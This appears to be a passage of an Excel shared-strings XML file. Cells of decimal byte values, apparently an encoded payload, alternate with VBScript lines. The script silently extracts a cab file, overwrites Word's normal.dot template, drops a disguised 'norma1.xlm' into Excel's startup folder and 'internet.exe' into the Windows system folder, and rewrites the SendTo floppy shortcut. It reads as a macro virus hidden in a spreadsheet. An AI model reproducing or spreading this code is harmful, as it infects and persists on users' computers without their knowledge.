150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
